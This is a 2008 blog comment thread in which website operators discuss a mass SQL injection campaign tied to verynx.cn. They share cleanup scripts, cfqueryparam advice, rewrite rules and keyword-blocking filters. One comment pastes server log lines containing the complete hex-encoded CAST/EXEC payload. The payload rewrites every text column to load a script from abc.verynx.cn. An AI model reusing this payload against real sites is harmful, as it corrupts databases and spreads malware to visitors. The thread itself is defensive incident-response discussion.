Comments on: SQL Injection Hack using CAST from 1.verynx.cn http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html rtraction blog Thu, 20 Nov 2008 16:23:57 +0000 http://wordpress.org/?v=2.1.2 By: Marc Lieberman http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9163 Marc Lieberman Tue, 22 Jul 2008 14:54:52 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9163 Our website was hit with this injection attack yesterday. Before the verynx.cn domain was shut down, what would happen to a user who visited our website, in case we start getting calls from people wondering if they received a virus or wondering if their credit card information is safe? Also, this attack seems to have targeted ColdFusion sites specifically, and the first recommendation I found was to make sure you are using . I'm surprised this wasn't mentioned under how to prevent SQL injection hacks. Our website was hit with this injection attack yesterday. Before the verynx.cn domain was shut down, what would happen to a user who visited our website, in case we start getting calls from people wondering if they received a virus or wondering if their credit card information is safe?

Also, this attack seems to have targeted ColdFusion sites specifically, and the first recommendation I found was to make sure you are using . I’m surprised this wasn’t mentioned under how to prevent SQL injection hacks.

]]> By: devit http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9165 devit Tue, 22 Jul 2008 15:48:23 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9165 From our digging the domain verynx.cn isn't actually down, but the offending sub domain 1.verynx.cn is down - and as far as we are aware it was down all day yesterday. We did however manage to dig up at least a portion of the payload. If for some reason users had it the infected website while the payload was available it would have installed a virus on their computer. We'll leave out the details of how the payload was loaded onto the users computer as theres no need to spread that type of information. Marc it looks like in your sentence about "the first recommendation I found was..." is missing the last word? We're assuming your going to suggest a cold fusion specific function to clean the input? Please clarify and we will gladly update the article. Thanks From our digging the domain verynx.cn isn’t actually down, but the offending sub domain 1.verynx.cn is down - and as far as we are aware it was down all day yesterday.

We did however manage to dig up at least a portion of the payload. If for some reason users had it the infected website while the payload was available it would have installed a virus on their computer.

We’ll leave out the details of how the payload was loaded onto the users computer as theres no need to spread that type of information.

Marc it looks like in your sentence about “the first recommendation I found was…” is missing the last word? We’re assuming your going to suggest a cold fusion specific function to clean the input?

Please clarify and we will gladly update the article.

Thanks

]]> By: devit http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9184 devit Wed, 23 Jul 2008 12:28:16 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9184 Thanks Marc - We believe you're correct - This attack appears to be directly targeted at coldfusion. We believe the command you left out above was the cfqueryparams function. Thanks for the tip, Devit Thanks Marc - We believe you’re correct - This attack appears to be directly targeted at coldfusion.

We believe the command you left out above was the cfqueryparams function.

Thanks for the tip,
Devit

]]> By: IH8IT http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9186 IH8IT Wed, 23 Jul 2008 13:05:09 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9186 For the less versed among use, can someone expand on the statement above as to how to "ensure the user connecting to your database doesn’t have execute permissions.". How can i tell "which user is connecting to my database"? And, "doesn't have execute permissions" where? In SQL, IIS, Coldfusion?... For the less versed among use, can someone expand on the statement above as to how to “ensure the user connecting to your database doesn’t have execute permissions.”. How can i tell “which user is connecting to my database”? And, “doesn’t have execute permissions” where? In SQL, IIS, Coldfusion?…

]]> By: Marc Funaro http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9189 Marc Funaro Wed, 23 Jul 2008 13:53:29 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9189 For those running IIS, a quick fix for the current attack vector is to install ISAPI_Rewrite (http://www.helicontech.com -- get the latest version for free, applies rules to all websites on the server), and create a regex rule that kills the request based on the known format of the attack. For example, the attack string contains "char(4000)" or "CHAR%284000%28" in the query string... so my config file for ISAPI_Rewrite looks like this: # Helicon ISAPI_Rewrite configuration file # Version 3.0.0.25 RewriteEngine on RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC] RewriteRule . - [F] RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC] RewriteRule . - [F] Stops the attack cold, before your application server even tries to execute. Of course, this is a bandaid approach; one change to the attack string, and you're vulnerable yet again. Proper user data validation and use of CFQUERYPARAM are the real answers... but for those that have to support older apps, or have a ton of code to go through, this can at least put a stop to the current threat... and it gives you quick a server-wide solution for stopping similar threats you may face while you fix your code. :) Apache users can obviously use mod_rewrite to accomplish the same goal. HTH For those running IIS, a quick fix for the current attack vector is to install ISAPI_Rewrite (http://www.helicontech.com — get the latest version for free, applies rules to all websites on the server), and create a regex rule that kills the request based on the known format of the attack. For example, the attack string contains “char(4000)” or “CHAR%284000%28″ in the query string… so my config file for ISAPI_Rewrite looks like this:

# Helicon ISAPI_Rewrite configuration file
# Version 3.0.0.25

RewriteEngine on
RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC]
RewriteRule . - [F]
RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC]
RewriteRule . - [F]

Stops the attack cold, before your application server even tries to execute.

Of course, this is a bandaid approach; one change to the attack string, and you’re vulnerable yet again. Proper user data validation and use of CFQUERYPARAM are the real answers… but for those that have to support older apps, or have a ton of code to go through, this can at least put a stop to the current threat… and it gives you quick a server-wide solution for stopping similar threats you may face while you fix your code. :)

Apache users can obviously use mod_rewrite to accomplish the same goal.

HTH

]]> By: Mike http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9191 Mike Wed, 23 Jul 2008 14:49:22 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9191 We were hit by these guys back in May on a classic ASP site. I think there might be more to how they went about the deed, because I am guessing that they started by running a query to list all table names. At least, I think that's how they figured out the syntaxt for the actual injection. We were hit by these guys back in May on a classic ASP site. I think there might be more to how they went about the deed, because I am guessing that they started by running a query to list all table names. At least, I think that’s how they figured out the syntaxt for the actual injection.

]]> By: Al http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9193 Al Wed, 23 Jul 2008 16:56:29 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9193 Hi there. Thanks for the info on this. We've been hit with this repeatedly over the last 4 days. We're scratching our heads as to how it's getting in. We found one likely place, and closed that door, but it was back within 24 hours. We're searching for more leaks in our coding... We are on a Cold Fusion platform also. One thing we did was build a little function looking for the following terms in user entry: declare execute select varchar We are logging those source IPs to a table and throwing CFABORT immediately for any subsequent traffic. Not really helpful. We collected over 10,000 unique IP addresses in 24 hours, and were attacked again. Our symptoms have been the same as mentioned here. This little attack appends a javascript to the end of just about every field in every table (varchars). The js in our database today was pointed at http://abc.verynx.cn/w.js - but it's been a different subdomain each time. Hi there. Thanks for the info on this. We’ve been hit with this repeatedly over the last 4 days. We’re scratching our heads as to how it’s getting in. We found one likely place, and closed that door, but it was back within 24 hours. We’re searching for more leaks in our coding… We are on a Cold Fusion platform also.

One thing we did was build a little function looking for the following terms in user entry:

declare
execute
select
varchar

We are logging those source IPs to a table and throwing CFABORT immediately for any subsequent traffic. Not really helpful. We collected over 10,000 unique IP addresses in 24 hours, and were attacked again.

Our symptoms have been the same as mentioned here. This little attack appends a javascript to the end of just about every field in every table (varchars). The js in our database today was pointed at http://abc.verynx.cn/w.js - but it’s been a different subdomain each time.

]]> By: James http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9195 James Wed, 23 Jul 2008 17:59:50 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9195 This code worked excellent - it stripped all records of 1.verynx HOWEVER as of 16:37 pm 23 July (got hit earlier with 1.verynx) - its hit again, this time using abc.verynx.cn - i tried ammending the above script to find abc.verynx instead but it wont work :( am i missing something? This code worked excellent - it stripped all records of 1.verynx
HOWEVER as of 16:37 pm 23 July (got hit earlier with 1.verynx) - its hit again, this time using abc.verynx.cn - i tried ammending the above script to find abc.verynx instead but it wont work :( am i missing something?

]]> By: IH8IT http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9196 IH8IT Wed, 23 Jul 2008 18:54:59 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9196 OK, this is getting rediculous. I have been hit with this 3 times, twice today alone. The latest redirect is to "abc.verynx.cn". OK, this is getting rediculous. I have been hit with this 3 times, twice today alone. The latest redirect is to “abc.verynx.cn”.

]]> By: Frank W http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9197 Frank W Wed, 23 Jul 2008 20:03:25 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9197 Hi, If someone had been to a site that's infected by the 1.verynx.cn (virus?) would a commercial virus program be able to detect it and remove it? Like Norton, Zone Alaram, Kaspersky, etc...? And yes I've watched the DNS go from 127.0.0.1 to other values that work! It's still out there and going on! Patch your sites! Thanks, Frank Hi,

If someone had been to a site that’s infected by the 1.verynx.cn (virus?) would a commercial virus program be able to detect it and remove it? Like Norton, Zone Alaram, Kaspersky, etc…? And yes I’ve watched the DNS go from 127.0.0.1 to other values that work! It’s still out there and going on! Patch your sites!

Thanks,
Frank

]]> By: Pedro Claudio http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9210 Pedro Claudio Thu, 24 Jul 2008 06:41:53 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9210 Hi, devit To prevent a coldfusion http://pcsilva.blogspot.com/2008/07/sql-injection.html . For other languages can transcribe, of course remember to add the name of the friend. Hi, devit To prevent a coldfusion http://pcsilva.blogspot.com/2008/07/sql-injection.html .

For other languages can transcribe, of course remember to add the name of the friend.

]]> By: Karen http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9211 Karen Thu, 24 Jul 2008 07:12:05 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9211 Earlier today I experienced this injection and repaired it. Then it occurred again, this time the sub domain in the code changed to abc.verynx.cn. Is this one down as well? I have repaired it again (thanks to the tip above which eliminated the need to restore a backup) but I obviously need to get to work on my CF scripts to prevent this. Not even sure where to start.. Earlier today I experienced this injection and repaired it. Then it occurred again, this time the sub domain in the code changed to abc.verynx.cn. Is this one down as well? I have repaired it again (thanks to the tip above which eliminated the need to restore a backup) but I obviously need to get to work on my CF scripts to prevent this. Not even sure where to start..

]]> By: Robert http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9215 Robert Thu, 24 Jul 2008 09:27:48 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9215 I have done some digging around on this subject since my server was attacked yesterday and found: 1.verynx.cn points to 127.0.0.1 and is blocked by Firefox (at least version 3) but not Internet Explorer. Following CF at the top of your application.cfm page is quite efficient against any kind of injection attacks (at least as far as I now know): I may have been a little overcautious with maybe too long a list, but I'm rather safe than sorry. If anyone has a better idea?? I used HP Srawlr 1.0 to scan my site for vulnerabilities and found that cfqueryparam alone isn't enough. I have done some digging around on this subject since my server was attacked yesterday and found:

1.verynx.cn points to 127.0.0.1 and is blocked by Firefox (at least version 3) but not Internet Explorer.

Following CF at the top of your application.cfm page is quite efficient against any kind of injection attacks (at least as far as I now know):

I may have been a little overcautious with maybe too long a list, but I’m rather safe than sorry. If anyone has a better idea??

I used HP Srawlr 1.0 to scan my site for vulnerabilities and found that cfqueryparam alone isn’t enough.

]]> By: Sharona http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9217 Sharona Thu, 24 Jul 2008 10:12:25 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9217 We just had an attack on our server today. It wasn't a coldfusion one, it was MSSql Server one. I was just wandering how these guys get into the db and update EVERY field??!! i created a script to remove it. hopefully this might help somebody out there with removing the code that was inserted into their db: update TABLENAME set FIELDNAME = replace(FIELDNAME,'"> We just had an attack on our server today. It wasn’t a coldfusion one, it was MSSql Server one. I was just wandering how these guys get into the db and update EVERY field??!!

i created a script to remove it. hopefully this might help somebody out there with removing the code that was inserted into their db:

update TABLENAME
set FIELDNAME = replace(FIELDNAME,’”>

]]> By: MichelV http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9223 MichelV Thu, 24 Jul 2008 10:32:33 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9223 I did get this from other IPs starting 24 July. Looks like it is moving. IPs from USA and Canada, I am currently counting up to 4 different ones. I did get this from other IPs starting 24 July. Looks like it is moving. IPs from USA and Canada, I am currently counting up to 4 different ones.

]]> By: Luis Melo http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9228 Luis Melo Thu, 24 Jul 2008 14:51:57 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9228 Our system was not SQL Injection proof and we recently suffered an attack that corrupted the data in some of our database tables. The attack was quite elegant and fortunately did not cause severe damage other than the appending of a SCRIPT sting to a bunch of VARCHAR fields. This was meant to actually execute a JS file and this qualifies as a XSS attack. In researching the Web for a solution for the problem, and a way to immunize our CF application against further attacks, we came across the CFQUERYPARAM solution, but our application has over 5000 files, each with one or more Queries and Stored Procedure calls. Implementing such a solution in such an extensive amount of files was impossible in a timely fashion, so I looked for another solution and came across a ColdFusion written function (isSqlInjection) that showed some promise but some shortcomings as well. I wanted something that we could deploy fast and that would immunize the entire application in one single swoop. As far as I understand, SQL injections can come from either FORM fields or from URL passed variables. Therefore we developed a function that was placed in our application.cfm and therefore used by all our CFM files. The function used a custom developed Regular Expression to check all URL and FORM fields for possible SQL Injections. We were able to develop this in one day and implement it immediately. That same night we were able to catch and prevent 2 more SQL Injection attempts. We have since improved the script and it now does the following: • Checks all FORM and URL input for SQL injection code • Interfaces (CFHTTP) with ARIN WHOIS Database Search (http://ws.arin.net/whois/) to get ISP information for the offender’s IP. • Automatically sends an abuse report to the ISP concerning the attack. • Displays a message informing the hacker that the attack was logged, that his/her ISP was contacted and that he/she is breaking the law • Sends us an email with the SQL Injection string, IP address and other information. • Stores the hacker’s IP address in an APPLICATION array (Black List). o Each time a page in our application is requested, the IP address (CGI.REMOTE_ADDR) is compared with those in the Black List and if it is present, page execution is halted right at the application.cfm level returning a blank page to the browser o Black List entries that are older than one hour are cleared by a scheduled task on an hourly basis. We are making this code available to other CF developers for free. Please request a copy by email. luism@grouptraveltech.com. If after receiving it you have suggestions or improvements, please send them my way as well. Our system was not SQL Injection proof and we recently suffered an attack that corrupted the data in some of our database tables. The attack was quite elegant and fortunately did not cause severe damage other than the appending of a SCRIPT sting to a bunch of VARCHAR fields. This was meant to actually execute a JS file and this qualifies as a XSS attack.
In researching the Web for a solution for the problem, and a way to immunize our CF application against further attacks, we came across the CFQUERYPARAM solution, but our application has over 5000 files, each with one or more Queries and Stored Procedure calls. Implementing such a solution in such an extensive amount of files was impossible in a timely fashion, so I looked for another solution and came across a ColdFusion written function (isSqlInjection) that showed some promise but some shortcomings as well.
I wanted something that we could deploy fast and that would immunize the entire application in one single swoop.
As far as I understand, SQL injections can come from either FORM fields or from URL passed variables. Therefore we developed a function that was placed in our application.cfm and therefore used by all our CFM files. The function used a custom developed Regular Expression to check all URL and FORM fields for possible SQL Injections.
We were able to develop this in one day and implement it immediately. That same night we were able to catch and prevent 2 more SQL Injection attempts.
We have since improved the script and it now does the following:
• Checks all FORM and URL input for SQL injection code
• Interfaces (CFHTTP) with ARIN WHOIS Database Search (http://ws.arin.net/whois/) to get ISP information for the offender’s IP.
• Automatically sends an abuse report to the ISP concerning the attack.
• Displays a message informing the hacker that the attack was logged, that his/her ISP was contacted and that he/she is breaking the law
• Sends us an email with the SQL Injection string, IP address and other information.
• Stores the hacker’s IP address in an APPLICATION array (Black List).
o Each time a page in our application is requested, the IP address (CGI.REMOTE_ADDR) is compared with those in the Black List and if it is present, page execution is halted right at the application.cfm level returning a blank page to the browser
o Black List entries that are older than one hour are cleared by a scheduled task on an hourly basis.
We are making this code available to other CF developers for free. Please request a copy by email. luism@grouptraveltech.com.
If after receiving it you have suggestions or improvements, please send them my way as well.

]]> By: Ben http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9232 Ben Thu, 24 Jul 2008 18:17:20 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9232 The company I contract for was hit with this. It appended the script to every varchar/text field. Thanks for a look at the unobfuscated code. I got here searching on 1.verynx.cn/w.js and so to others who do the same: as mentioned above, cfqueryparam is good for escaping all data,ie: cfqueryparam value="#FORM.first_name#" cfsqltype="CF_SQL_VARCHAR" cfqueryparam value="#URL.id" cfsqltype="CF_SQL_INTEGER" Our (naive) mistake was in believing that only input/form data was vulnerable - and not dynamic urls that pull simple select statements. Other solutions might involve creating a read-only db user for any read only areas, scanning the db at intervals for script/object/iframe etc. I also found a script that runs through and examines all your queries to make sure they're parameterized which we found useful: http://www.cfprimer.com/downloads.cfm My php/mysql sites were also hit (but failed, fortunately) - while the above targets SQL Server, I read somewhere else that there's a working MySQL version of this. I believe the js installed a zombie virus, to be called upon to propagate the attack. Tracing the IPs where we were getting hit from, many were from cable connections in the states. Very sci fi. The company I contract for was hit with this. It appended the script to every varchar/text field. Thanks for a look at the unobfuscated code. I got here searching on 1.verynx.cn/w.js and so to others who do the same:

as mentioned above, cfqueryparam is good for escaping all data,ie:
cfqueryparam value=”#FORM.first_name#” cfsqltype=”CF_SQL_VARCHAR”
cfqueryparam value=”#URL.id” cfsqltype=”CF_SQL_INTEGER”

Our (naive) mistake was in believing that only input/form data was vulnerable - and not dynamic urls that pull simple select statements.

Other solutions might involve creating a read-only db user for any read only areas, scanning the db at intervals for script/object/iframe etc.

I also found a script that runs through and examines all your queries to make sure they’re parameterized which we found useful:
http://www.cfprimer.com/downloads.cfm

My php/mysql sites were also hit (but failed, fortunately) - while the above targets SQL Server, I read somewhere else that there’s a working MySQL version of this.

I believe the js installed a zombie virus, to be called upon to propagate the attack. Tracing the IPs where we were getting hit from, many were from cable connections in the states. Very sci fi.

]]> By: tieguy http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9238 tieguy Fri, 25 Jul 2008 00:37:09 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9238 Help Please I have seen this in my log files called ipower and linked them this site still no help have a look at the latest logs started last night 59.36.21.120 - - [23/Jul/2008:12:54:39 -0400] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40 432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732 06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393 9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504 54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544 F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746 5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C7363726 97074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2 72720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633 D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554 4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53452054 61626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 18806 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 59.36.21.120 - - [23/Jul/2008:12:54:39 -0400] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40 432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732 06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393 9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504 54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544 F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746 5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372 697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2 D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073726 33D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645 544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520 5461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 18806 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Then today :: 59.6.82.62 - - [24/Jul/2008:07:59:25 -0400] "GET / HTTP/1.1" 403 825 "-" "Microsoft URL Control - 6.00.8169" 208.80.193.40 - - [24/Jul/2008:08:00:13 -0400] "GET / HTTP/1.0" 200 36899 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={CF07971C-C698-451d-BAB9-18491326916A}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Media Center PC 2.8; MEGAUPLOAD 1.0)" 208.80.193.36 - - [24/Jul/2008:13:02:02 -0400] "GET / HTTP/1.0" 200 36899 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft; ZangoToolbar 4.8.2)" WTF is this? Help Please
I have seen this in my log files
called ipower and linked them this site still no help
have a look at the latest logs
started last night
59.36.21.120 - - [23/Jul/2008:12:54:39 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40
432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073
656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393
9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C7363726
97074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2
72720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633
D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554
4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53452054
61626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1″ 200 18806 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
59.36.21.120 - - [23/Jul/2008:12:54:39 -0400] “GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40
432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073
656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D393
9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372
697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2
D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073726
33D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645
544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520
5461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1″ 200 18806 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

Then today ::

59.6.82.62 - - [24/Jul/2008:07:59:25 -0400] “GET / HTTP/1.1″ 403 825 “-” “Microsoft URL Control - 6.00.8169″
208.80.193.40 - - [24/Jul/2008:08:00:13 -0400] “GET / HTTP/1.0″ 200 36899 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={CF07971C-C698-451d-BAB9-18491326916A}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Media Center PC 2.8; MEGAUPLOAD 1.0)”
208.80.193.36 - - [24/Jul/2008:13:02:02 -0400] “GET / HTTP/1.0″ 200 36899 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft; ZangoToolbar 4.8.2)”

WTF is this?

]]> By: tieguy http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9239 tieguy Fri, 25 Jul 2008 00:38:54 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9239 thank you thank you

]]> By: Jonathan http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9240 Jonathan Fri, 25 Jul 2008 01:25:31 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9240 Our site has been hit multiple times with this as well. Thanks for posting the solution for cleaning up the mess. I've spent countless hours on this over the past few days. Our site has been hit multiple times with this as well. Thanks for posting the solution for cleaning up the mess. I’ve spent countless hours on this over the past few days.

]]> By: Mark http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9243 Mark Fri, 25 Jul 2008 03:55:36 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9243 Here's some pretty simple injector projection code that I implemented into my application.cfm file It's been effective so far in blocking out further hacking attempts and since it emails me the details on the perp, I can block the IP and notify the ISP. SQL INJECTION PROTECTOR CODE (stored in /application.cfm) ======================================================== HACK ATTEMPT RECORDED FROM IP: #remote_addr# #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")# #script_name#&#query_string# HACK ATTEMPT RECORDED: #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")# IP: #remote_addr# ATTEMPT: http://#server_name#/#script_name#&#query_string# Here’s some pretty simple injector projection code that I implemented into my application.cfm file It’s been effective so far in blocking out further hacking attempts and since it emails me the details on the perp, I can block the IP and notify the ISP.

SQL INJECTION PROTECTOR CODE (stored in /application.cfm)

========================================================

HACK ATTEMPT RECORDED FROM IP: #remote_addr#

#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

#script_name#&#query_string#

HACK ATTEMPT RECORDED:

#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

IP: #remote_addr#

ATTEMPT:

http://#server_name#/#script_name#&#query_string#

]]> By: Mark http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9245 Mark Fri, 25 Jul 2008 03:57:57 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9245 SQL INJECTION PROTECTOR CODE (stored in /application.cfm) ======================================================= <cfparam name="query_string" default=""> <cfif query_string contains "SELECT" or query_string contains "EXECUTE" or query_string contains "DECLARE" or query_string contains "VARCHAR" or query_string contains "CONVERT"> <cfoutput> <pre> <h1>HACK ATTEMPT RECORDED FROM IP: #remote_addr#</h1> #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")# #script_name#&#query_string# </pre> </cfoutput> <cfmail to="mark@warrick.net" from="webmaster@zapconnect.com" subject="HACK ATTEMPT FROM IP: #remote_addr#"> HACK ATTEMPT RECORDED: #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")# IP: #remote_addr# ATTEMPT: http://#server_name#/#script_name#&#query_string# </cfmail> <cfabort> </cfif> ======================================================== SQL INJECTION PROTECTOR CODE (stored in /application.cfm)
=======================================================

<cfparam name=”query_string” default=”">

<cfif query_string contains “SELECT” or query_string contains “EXECUTE” or query_string contains “DECLARE” or query_string contains “VARCHAR” or query_string contains “CONVERT”>

<cfoutput>

<pre>

<h1>HACK ATTEMPT RECORDED FROM IP: #remote_addr#</h1>

#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

#script_name#&#query_string#

</pre>

</cfoutput>

<cfmail

to=”mark@warrick.net”

from=”webmaster@zapconnect.com”

subject=”HACK ATTEMPT FROM IP: #remote_addr#”>

HACK ATTEMPT RECORDED:

#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

IP: #remote_addr#

ATTEMPT:

http://#server_name#/#script_name#&#query_string#

</cfmail>

<cfabort>

</cfif>

========================================================

